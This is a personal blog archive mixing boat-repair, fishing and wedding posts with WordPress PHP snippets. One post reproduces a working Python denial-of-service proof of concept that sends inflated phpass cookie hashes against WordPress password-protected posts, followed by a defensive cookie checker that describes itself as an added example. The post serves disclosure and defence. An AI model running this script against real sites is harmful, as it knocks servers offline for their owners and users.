Snorkeling Grecian Rocks, 6/28/2013

The day before our wedding, we took some guests out to Grecian Rocks off Key Largo for a snorkeling adventure that they’ll never forget.

More Goodies For The Boat

I wanted to write an update to my last post about fixing up my boat.

I re-installed the starter, tightened up all the other small issues, and cranked the engine for about ten minutes. Nothing.

BUT … I think I flooded it … because the next day she fired up on the first try, nice and strong, just like she should!

Before it was running, I bought this tool to [attempt to] test the ignition system:

AutoCraft AC664 Ignition Tester

To be fair, the boat has a points ignition system which may somehow differ from other similar systems, but this thing DID NOT do the job. A spark is a spark, and nothing was happening with this tool installed as it should be. My guess? The shaft is pretty loose and difficult to adjust, and coated with some sort of anodized material. They should have made the shaft uncoated copper, aluminum, or nickel. NOT anodized steel.

I know the tool wasn’t working as it should, because the engine actually fired up while it was connected, but this thing still wasn’t sparkin’!

Yesterday, I decided I was sick of wrenching the batteries on and off every time I got on the boat. So, I ordered this:

This is a fantastic piece, which allows me to select a single battery, both batteries, or completely disconnect them. It’s rated for 230A continuous and 345A momentary, which should be ample (no pun intended). It also includes a field disconnect, so the switch can be moved with the engine running – which is a great feature. Installation was quick and easy.

So the boat starts, runs, shifts, and (hopefully) floats well. Time to go play! We’re leaving for the Keys tomorrow evening … Cheers!

Rebuilding the Boat, One Piece at a Time

With the birth of our baby boy, I haven’t had a whole lot of time to spend working on my favorite project, a 1989 Raven 2100cc cruiser. But next week, our wedding is coming up. We’ve rented a nice house in Key Largo for the wedding week which is on the water. My plan all along was to have our boat parked behind the house ready to go at a moment’s notice.

That means spending a bunch of time getting the boat ready to go. As I said, I haven’t had a chance to fuss with the boat in a few months, much less maintain or take it out for a spin. The poor thing needs some love…

Over the last month, I toured the hardware stores of Palm Beach county and rounded up the pieces needed to convert the trailer to a bunk-type trailer. I’ll wait until the boat is in the water to make this modification, though.

I’m not a huge fan of the rollers. Just look what they’re doing to the bottom of the boat!

A bunch of time was also spent purchasing “manly” tools like a circular saw and angle grinder, and assembling new seat bases and a new engine cover. Next, I carpeted the pieces and got them re-installed in the boat. The old ones were pretty rotten!

New seat bases and engine cover

I towed her home, hooked up the hose, and turned the key. -click- NOTHING. SMH. Check the battery. Not dead. NOT GOOD.

I pulled the cover off the engine.

Getting this beast ready for the summer

After a close inspection of the electric system, I decided that everything was so corroded that there couldn’t be much current getting to the starter. I pull out the tools and go to work. The first stop was the starter wiring. I went to remove the big wires to the starter, and because it was rusted solid, I broke off part of the starter solenoid.

While removing power cables, I broke the terminal right off the solenoid

Nice. Removed the whole starter from the engine and took it upstairs. Bench tested the starter motor – works great even though about a half-gallon of water came streaming out when I inverted it. Removed the covers, cleaned the motor well, and reassembled. Working even better now! Next, I ordered a new solenoid from Amazon. Thanks to Tina’s wonderful Amazon Prime membership, it arrived the next day. After reassembly, we have this beautiful piece:

Brand new solenoid and reconditioned (internals) for the starter motor

Okay, bench tested it once more, and it’s working exactly as it should. Cool beans! Maybe I should grab a can of Rustoleum to get it looking nice again? Nahh, too much effort and that probably won’t really help for long.

After I invest in a gallon of dielectric grease, I’ll re-install it, clean up the terminals on the trim system wiring, and start over! Only seven days to go before the wedding week begins, so I gotta have her running solid before then! Wish me luck!

UPDATE 6/19: Got the starter re-installed and she cranks right over. Now, to hook back up fuel and fire and see what happens! I feel confident that things are going to work just fine.

WordPress search__only_ Variables

Here’s another object-oriented mu-plugin that you can expand upon if needed. This adds the option to perform a search with “&search__only_titles” or “&search__only_content” in the url to search only titles or content of posts.

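[code language="php"]
<?php

class rdc_search_object {

    function __construct() {
        // The callback is a method, so register it together with this instance
        add_filter( 'posts_search', array( $this, 'filter__posts_search' ) );
    }

    // $query is the search clause WordPress built; for a one-word search it
    // has the shape " AND (((title LIKE ...) OR (content LIKE ...)))"
    function filter__posts_search( $query ) {
        $query_parts = explode( ' OR ', $query );

        // Not a search, or no OR in the clause: leave it untouched
        if ( count( $query_parts ) < 2 )
            return $query;

        // The $_GET keys only act as flags; their values never reach the SQL
        if ( isset( $_GET['search__only_titles'] ) )
            return $query_parts[0] . '))';

        if ( isset( $_GET['search__only_content'] ) )
            return ' AND ((' . $query_parts[1];

        return $query;
    }

}

$rdc_search_object = new rdc_search_object();

// omit[/code]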

Go ahead and use this juicy tidbit and let me know in the comments what creative use you found for it.

Never-Ending Pagination in WordPress

Take your site’s slideshows to the next level with the following:

[code language="php"]// Slightly different way of getting a previous post than get_adjacent_post(), this
// function will grab a post in a SINGLE specific category. We'll go ahead and
// return it as a permalink since that's ultimately what we want anyways.
function rdc_get_prev_url_in_category( $in_category ) {
    global $post, $wpdb;

    // Convert category to id if it's a slug
    if ( ! is_numeric( $in_category ) ) {
        $category = get_category_by_slug( $in_category );

        // Unknown slug, nothing to link to. Go home instead.
        if ( ! $category )
            return get_bloginfo( 'home' );

        $in_category = $category->term_id;
    }

    // This query will grab the preceding post id in $in_category.
    // Both values are bound as integers through the %d placeholders.
    $query = $wpdb->prepare( "
        SELECT p.ID FROM $wpdb->posts AS p
        INNER JOIN $wpdb->term_relationships AS tr ON p.ID = tr.object_id
        INNER JOIN $wpdb->term_taxonomy tt ON tr.term_taxonomy_id = tt.term_taxonomy_id
        AND tt.taxonomy = 'category'
        AND tt.term_id IN (%d)
        WHERE p.ID < %d
        AND p.post_type = 'post'
        AND p.post_status = 'publish'
        ORDER BY p.ID DESC LIMIT 1
    ", $in_category, $post->ID );

    // Formulate cache key and see if it exists
    $query_key = 'rdc_previous_post_' . md5( $query );
    $result = wp_cache_get( $query_key );

    // Cache key exists and holds a post id, so lets use it
    if ( false !== $result && $result ) {
        $prev_post = get_post( $result );
        return get_permalink( $prev_post->ID );
    }

    // Cache key didn't exist, lets run a new query
    $result = $wpdb->get_var( $query );

    // Query failed for some reason, probably this is
    // the first post in the category. Go home instead.
    if ( null === $result )
        return get_bloginfo( 'home' );

    // Save query result for use later
    wp_cache_set( $query_key, $result );

    // Return the permalink of the resulting post id
    if ( $result ) {
        $prev_post = get_post( $result );
        return get_permalink( $prev_post->ID );
    }

    // Something crazy happened to get here, but you
    // never know ...
    return get_bloginfo( 'home' );
}[/code]

The next part actually filters the wp_link_pages arguments and decides where to put a next button where one didn’t previously exist. I also threw in an additional previous button, which uses some javascript to take the user back to the previous page. There’s probably some creative logic you can write to do it without javascript, but that’s probably unnecessary in today’s world.

[code language="php"]function rdc_filter_wp_link_pages_args( $r ) {
    global $page, $numpages;

    // These links should match the design of your existing links
    // and you should change 12345 to your slideshow category

    // If last page of a slideshow, show a "next" button where there wouldn't normally be one
    if ( $r['next_or_number'] == 'next' && $page == $numpages && '' == $r['previouspagelink'] ) {
        // esc_url() keeps the permalink safe to place inside the href attribute
        $repl_next_link = '<a href="' . esc_url( rdc_get_prev_url_in_category( 12345 ) ) . '">NEXT &raquo;</a>';
        echo $r['before'] . $repl_next_link . $r['after'];
    }

    // If first page of a slideshow, showing "back" button where there wouldn't normally be one
    if ( $r['next_or_number'] == 'next' && $page == 1 && '' == $r['nextpagelink'] ) {
        $repl_prev_link = '<a onclick="window.history.back();">&laquo; PREVIOUS</a>';
        echo $r['before'] . $repl_prev_link . $r['after'];
    }

    return $r;
}
add_filter( 'wp_link_pages_args', 'rdc_filter_wp_link_pages_args' );[/code]

WordPress Password Post DoS Vulnerability

Hey guys, it’s a bad day when I get things like this in my inbox:

[python]# Proof of Concept
# WordPress 3.5.1
# Denial of Service
# Author: vnd at vndh.net
import httplib
import re

def get_cookie_hash(hostname, wplogin):
    headers = {'Content-type': 'application/x-www-form-urlencoded'}
    handler = httplib.HTTPConnection(hostname)
    handler.request('POST', wplogin, 'action=postpass&post_password=none', headers=headers)
    response = handler.getresponse()
    set_cookie = response.getheader('set-cookie')
    if set_cookie is None: raise RuntimeError('cannot fetch set-cookie header')

    pattern = re.compile('wp-postpass_([0-9a-f]{32})')
    result = pattern.search(set_cookie)
    if result is None: raise RuntimeError('cannot fetch cookie hash')

    return result.groups()[0]

def send_request(hostname, post, cookie_name):
    headers = {'Cookie': 'wp-postpass_%s=%%24P%%24Spaddding' % cookie_name}
    handler = httplib.HTTPConnection(hostname)
    handler.request('GET', post, 'action=postpass&post_password=asdf', headers=headers)

if __name__ == '__main__':
    hostname = 'wordpress.remote'
    wplogin = '/wp-login.php'
    posturl = '/?p=4' # link to password protected post
    requests = 1000

    cookie_hash = get_cookie_hash(hostname, wplogin)
    print '[+] received cookie hash: %s' % cookie_hash
    for i in xrange(requests):
        print '[+] sending request %d...' % (i + 1)
        send_request(hostname, posturl, cookie_hash)[/python]

It’s even worse when I run the code and the target server crashes and burns.

I wanted to make everyone else in the WordPress community aware that this threat is very real. I’ve tested it on 3.1, 3.5, and 3.6 – all very vulnerable – and I would guess that versions below 3 are also vulnerable. If you are using password protected posts, you’ll want to go reverse that setting on each post. This exploit, though targeted, will completely cripple your server if run against it.

The WP Core Team is working on a patch which will fix this – however, the solution that Krzysztof provided at https://vndh.net/note:wordpress-351-denial-service did not work for me; the vulnerability remained. My guess is Krzysztof had a more powerful server which was able to overcome the attack. In the case of most shared hosts and/or less-scaled servers, the fix will not help. Based on the nature of how the attack works, this jumps out at me as the reason.

SIDENOTE: This isn’t actually a vulnerability in WordPress, it’s in the phpass library that WordPress uses. I’m guessing there are other very vulnerable software packages out there.

Anyways, until 3.6 you might want to refrain from using any password protected posts. Good luck!
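The cookie value in the proof of concept above, `$P$Spaddding`, is the start of a phpass portable hash: the character after `$P$` encodes log2 of the iteration count, and `S` is index 30, where WordPress-generated hashes carry `B` (13). The check below is an added example, not code from the original post, WordPress, or phpass; it flags such cookies in a raw Cookie header. The function names and the cost-13 baseline are assumptions, and the sample headers are constructed.

```python
import re
from urllib.parse import unquote

# phpass portable-hash alphabet: the character after "$P$" is an index into it
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
EXPECTED_LOG2 = 13  # assumption: the site's own hashes start with "$P$B"
POSTPASS = re.compile(r"wp-postpass_[0-9a-f]{32}=([^;\s]*)")

# Constructed sample headers: a normal visitor, and the cookie the PoC sends
BENIGN = "wp-postpass_" + "a" * 32 + "=%24P%24Bsaltsalt" + "x" * 22
POC = "wp-postpass_" + "0" * 32 + "=%24P%24Spaddding"


def inspect_postpass(value, expected=EXPECTED_LOG2):
    """Classify one URL-decoded wp-postpass cookie value as (verdict, reason)."""
    if value[:3] not in ("$P$", "$H$") or len(value) < 4:
        return ("reject", "not a phpass portable hash")
    log2 = ITOA64.find(value[3])  # -1 if the character is outside the alphabet
    if log2 > expected:
        # Checked before the length test: the PoC value is short but still costly
        return ("reject", "cost field asks for 2^%d iterations" % log2)
    if len(value) != 34 or log2 < 7:
        # A real hash is "$P$" + cost char + 8-char salt + 22-char digest
        return ("reject", "malformed hash")
    return ("ok", "cost 2^%d" % log2)


def check_cookie_header(header, expected=EXPECTED_LOG2):
    """Return one (verdict, reason) tuple per wp-postpass cookie in a Cookie header."""
    return [inspect_postpass(unquote(raw), expected)
            for raw in POSTPASS.findall(header)]


if __name__ == "__main__":
    for name, header in (("benign", BENIGN), ("poc", POC)):
        print(name, check_cookie_header(header))
```

The check belongs wherever the Cookie header is visible before PHP handles the request, such as a reverse proxy hook or a request log that records cookies.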

Plantation Boat Mart Owner’s Tournament

The Reef-Seeker Crew

All this parenting talk might lead you to believe that I’ve gone soft.

On the contrary friends, on the contrary.

Over the weekend, I wrestled with a tournament winning fish that happened to be on the end of my line. He pulled hard, wound up under the boat around one of the engines, and then back down on the ocean floor. I fought with the beast and freed the line from the engine and tried to get the fish into the boat. After a few minutes of battle there was a mighty tug from the opposing end and then the 50# line broke. Rats.

Did I mention that I was doing all of that with my bare hands, because the line had been cut somewhere between the fish and the fishing pole? Did I also mention that the boat was pitching wildly in 600-feet of water 20-miles off Islamorada in the post-tropical-storm ocean?

Needless to say, I only landed one other fish, which broke the leader crimp at the boat. It was not a productive day for the Reef Seeker – we only managed to get a single under-sized fish on board. Back into the ocean for that one.

So back on shore at the weigh-in and awards ceremony, we found out that my fish would have easily won the big money prize in comparison to the average-sized winning Mahi. The same can be said of another fish that Roger hooked up with. A huge 180 from last year, now we’re able to find the fish but can’t seem to get them into the boat. This can only spell great things for next year … or maybe we’ll try again next week!

I have certainly not lost my adventurous spirit – in fact, I am excited to bring Rylan along on these adventures, but it’s probably too soon for that still.

Cheers!

Starting a Family is a Lot Like Work

Wow – welcome to being old and wrinkly, overweight, and sounding a lot like people from some previous generation. I just blinked my eyes and my squeaky-clean newborn is almost four months old. I can’t believe it. They really do grow up so fast. Multiply that by three and we have a one-year-old. Again by five and he’ll be heading off to kindergarten. I don’t even want to think about anything further than that.

Rich and Rylan

Anyways, I’m having a blast being a father. Rylan is robust enough now that I don’t feel like he’s going to break whenever I pick him up. And he’s a tough kid already. He’ll rival the best of them with his stunning good looks, strength, and that cranium. The kid is already attempting to have intelligent conversations and very clearly picks up on pretty high-level stuff. Nice… He’ll be outsmarting his parents in no time. I can’t wait.

Tina and Rich

So we’re also in the home stretch of wedding planning. It seems like all the major stuff is organized, planned, and paid for. We’re on to all of the finest details now – which socks will match my outfit, which hairstyle looks right with Tina’s dress, what font to use on place-markers. You know, the types of things that don’t cost much but will make you absolutely daft during contemplation.

I’m more excited than I thought I would be though. Naturally, it is my wedding, and I’m marrying a woman that I love. But more than that, I’m marrying a woman that I like very much. So all modesty out the window and cheers to me. I can’t wait to see a few of you there, and share with you one of the most special nights of my life. And the parties. Oh, the parties. I can’t wait to see a few of you experience how we party in Key Largo. Plan to go home with a belly full of Mahi-mahi, and still swaying from a combination of island lager and time aboard various sea vessels. Don’t plan to go home un-entertained.